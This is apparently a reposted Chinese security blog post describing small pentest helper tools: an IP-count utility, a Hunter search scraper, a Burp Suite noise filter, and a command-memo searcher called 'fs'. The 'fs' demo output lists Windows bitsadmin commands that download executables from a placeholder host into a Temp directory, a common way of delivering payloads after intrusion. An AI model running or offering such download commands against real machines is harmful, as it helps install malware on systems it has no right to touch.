0x01 工具介绍
0x02 安装与使用
记录自己的出口IP攻击者IP次数统计在看golang,顺手就把之前的一些python改成golang了。这工具有个好处就在于统计出现次数,虽然Excel其实可以做得很好,但好多时候我连Excel都难得打开。把这工具添加环境变量,直接一条命令解决。网上其实关于hunter的爬虫工具非常多,但不知道为啥总冥冥之中觉得不适合自己,所以造了这个轮子。
功能大体跟别的相似,并且只支持hunter,原因是fofa有ehole、360可以直接导出。我费那个劲集成在一起干啥,并且这些工具其实人家都做得挺不错。
hunters计划后头写成图形化的,别问为啥,有些时候命令行总觉得缺了点啥(单纯个人觉得)Burpsuite代理的时候可以使用这部分过滤非常多的垃圾网站(包含一部分互联网企业,如果挖掘src的需要自行研判了)以此减轻BurpSuite被动扫描的压力。年龄大了?记忆不好?就用fs
代码很简洁,需要自己简单修改下代码,没有很好做好适配。
把你常用且又爱忘记的一些命令放到use.log里,然后通过执行Linux命令来检索。
那么你只需要编译好这个工具以后直接fs admin,就可以检索admin相关的信息出来。
➜ ~ fs bitsadmin-+====================================+- 181 ➜ windows download[+]:bitsadmin /rawreturn /transfer getfile http://x.x.x.x:8888/tomcat.exe c:\users\Manager\AppData\Local\Temp 183 ➜ windows download[+]:bitsadmin /rawreturn /transfer down "http://127.0.0.1:8080/z.exe" c:\z.exe 259 ➜ bitsadmin /rawreturn /transfer getfile http://x.x.x.x/tomcat.exe c:\users\Manager\AppData\Local\Temp-+====================================+-0x03 项目链接下载
原文始发于微信公众号(LemonSec):渗透测试小工具集
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论